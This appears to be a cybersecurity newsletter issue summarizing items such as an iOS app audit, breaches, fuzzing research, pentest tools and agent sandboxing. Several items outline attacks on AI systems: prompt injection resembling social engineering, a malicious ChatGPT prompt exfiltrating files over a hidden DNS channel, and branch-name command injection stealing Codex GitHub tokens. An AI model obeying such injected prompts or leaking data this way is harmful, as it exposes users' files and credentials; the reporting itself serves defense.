Attacks & Vulnerabilities | Security Analysis of the Official White House iOS App (8 minute read) Researchers performing static analysis on the official White House iOS app uncovered eight critical security findings: six WebViews execute live, unverified JavaScript from Elfsight, a widget company founded in Russia, via a two-stage loader that allows Elfsight's servers to inject arbitrary scripts at runtime with no Subresource Integrity checks and a ReactNativeWebView.postMessage() bridge to the native layer. The app ships OneSignalLocation.framework with always-on background GPS collection, a provably false privacy manifest declaring zero data collection despite ten analytics frameworks in the binary, OneSignal remote parameters that can silently toggle location tracking without an app update, JavaScript that programmatically strips GDPR and cookie consent banners across all WebViews, and a dormant Expo OTA pipeline that, if enabled, would allow arbitrary JavaScript pushes to all devices bypassing App Store review entirely. The app implements no certificate pinning, jailbreak detection, anti-tampering, or runtime integrity checks, leaving API traffic trivially interceptable via MITM on any shared network. | Stats SA Confirms Data Breach as Hackers Demand R1.7M Ransom (2 minute read) Stats SA, a South African governmental organization that plays a central role in producing reliable data, confirmed that it suffered a data breach. The XP95 hacking group claimed responsibility and is demanding a R1.7M ($100K) ransom for the 154GB of data it stole. Stats SA stated that the system that was breached was an HR system for job-seekers to apply online, and it will not be paying the ransom. | Hackers Now Exploit F5 BIG-IP Flaw in Attacks (2 minute read) F5 Networks has reclassified a 2025 DoS vulnerability in its BIG-IP APM (Access Policy Manager) as a remote code execution vulnerability. F5 warned that the vulnerability can be exploited by unauthenticated attackers and that they have observed it being exploited in the wild. CISA has also added it to its Known Exploited Vulnerabilities (KEV) catalog. | | On the Effectiveness of Mutational Grammar Fuzzing (8 minute read) Google Project Zero's Ivan Fratric identifies two core weaknesses in coverage-guided grammar fuzzing: coverage metrics fail to reward chained function call sequences needed to trigger complex bugs, and greedy corpus saving produces low-diversity sample sets that converge toward similar inputs. Fratric counters both issues with a periodic worker-restart strategy, in which each worker builds an independent corpus for T seconds before syncing with a shared server, alternating between generative and mutational phases. Experiments against libxslt showed that this approach uncovered up to 9 unique crashes, compared with 2-5 in continuous single-worker sessions, with T=3600 seconds proving optimal for that target. | AI Coding Tools in a Sandbox: Why Your File System Needs Protection (3 minute read) AI coding tools like Claude Code, Copilot, and Cursor run with full user-level filesystem permissions, meaning a hallucinated path or misinterpreted command can expose SSH keys, credentials, and sensitive files outside the project directory. bx wraps any AI coding tool using macOS's kernel-level sandbox-exec to restrict filesystem visibility to the target project directory only, with a .bxignore file allowing per-project exclusion of .env files, certificates, and secrets even within the allowed path. Enforcement occurs at the OS kernel before any process can act, so the protection covers not just direct file operations but also MCP server calls, shell commands, and automated hooks that would otherwise execute with the user's full permissions. | Designing AI Agents to Resist Prompt Injection (5 minute read) Prompt injection attacks have evolved to more closely resemble social engineering attempts, which makes them harder to distinguish. Some organizations are deploying AI firewalls that attempt to scan inputs to the agents and classify the input as benign or malicious. OpenAI developed a mitigation system for when agents are convinced to act maliciously by a prompt injection attack called Safe URL, which attempts to detect when information would be transmitted to a third-party and prompts the user in those cases. | | vscode-frida (GitHub Repo) A VSCode extension that brings a full Frida instrumentation workbench into the editor, featuring a sidebar process/app browser for local, USB, and remote devices, runtime panels for browsing native modules, ObjC classes, and Java methods with one-click hook generation, and an LSP server that provides context-aware autocomplete for Frida scripts against a live target process. It also includes Android tooling for automatic frida-server deployment and APK extraction, iOS SSH shell support, project scaffolding for TypeScript agents and C modules, and GitHub Copilot integration for AI-assisted native hook generation. | Inside AWS Security Agent: A multi-agent architecture for automated penetration testing (4 minute read) AWS Security Agent, now in public preview, is a multi-agent penetration testing system that chains specialized agents across authentication, baseline scanning, managed execution, guided exploration, and assertion-based validation phases to autonomously discover and confirm vulnerabilities. Swarm worker agents are equipped with web fuzzers, code executors, and access to the NVD/CVE databases, while a guided exploration agent dynamically generates context-aware test plans that chain multi-step attacks, such as IDOR combined with authentication bypass. On the CVE Bench v2.0 benchmark, the system achieved 80% attack success rate under real-world conditions without CTF instructions or grader feedback. | PrivHound (GitHub Repo) Privhound is a BloodHound collector for OpenGraph that models Windows local privilege escalation as interconnected attack paths. Unlike WinPEAS or PowerUp, PrivHound automatically chains multi-hop escalation paths, such as PSReadLine history containing credentials for a user with write access to a SYSTEM service binary, and overlays local privesc paths onto existing Active Directory attack graphs. Cross-user escalation analysis uses LogonUser and GetTokenInformation to evaluate what discovered credential targets can access without requiring SeImpersonatePrivilege. | | Converging Interests: Analysis of Threat Clusters Targeting a Southeast Asian Government (12 minute read) Unit 42 uncovered three simultaneous, China-aligned threat clusters targeting a Southeast Asian government between June and August 2025: Stately Taurus deployed the USBFect worm (aka HIUPAN) to propagate the PUBLOAD backdoor via removable media, CL-STA-1048 rotated through a noisy multi-RAT toolkit spanning EggStremeFuel, Masol RAT, EggStreme Loader, Gorem RAT, and the TrackBak infostealer in an apparent attempt to evade XDR detection, and CL-STA-1049 used a novel DLL sideloading chain called Hypnosis loader to quietly deliver FluffyGh0st RAT. TTP overlaps tie the clusters to Earth Estries, Unfading Sea Haze, and the Crimson Palace campaign, suggesting that distinct but aligned operators are coordinating to target the same high-value network. Defenders should monitor for DLL sideloading against legitimate security vendor binaries, USB-propagated payloads masquerading under ProgramData\Intel paths, and C2 traffic to the listed IOCs. | Databricks pitches Lakewatch as a cheaper SIEM — but is it really? (3 minute read) Databricks' Lakewatch is an open agentic SIEM built on its lakehouse architecture that charges on compute rather than ingestion, promising up to 80% TCO reduction and years of hot, queryable data for threat hunting and compliance. The platform integrates Unity Catalog, Lakeflow Connect, and OCSF normalization to centralize security operations and is backed by the acquisitions of Antimatter and SiftD.ai. Analysts caution that costs shift to compute rather than disappear, and near-term adoption will likely be limited to large enterprises already invested in the Databricks ecosystem. | OpenAI Patches ChatGPT Data Exfiltration Flaw and Codex GitHub Token Vulnerability (4 minute read) Check Point found a flaw in ChatGPT that let a malicious prompt silently exfiltrate user messages and uploaded files via a hidden DNS channel in the Linux runtime, with Custom GPTs being able to bake it in, no user interaction required. Separately, BeyondTrust found a command injection bug in OpenAI Codex: injecting commands via a crafted GitHub branch name could steal GitHub tokens and grant read/write access to the victim's full codebase. Both have now been fixed. | | | Love TLDR? Tell your friends and get rewards! | | Share your referral link below with friends to get free TLDR swag! | | | | Track your referrals here. | | | |
0 Comments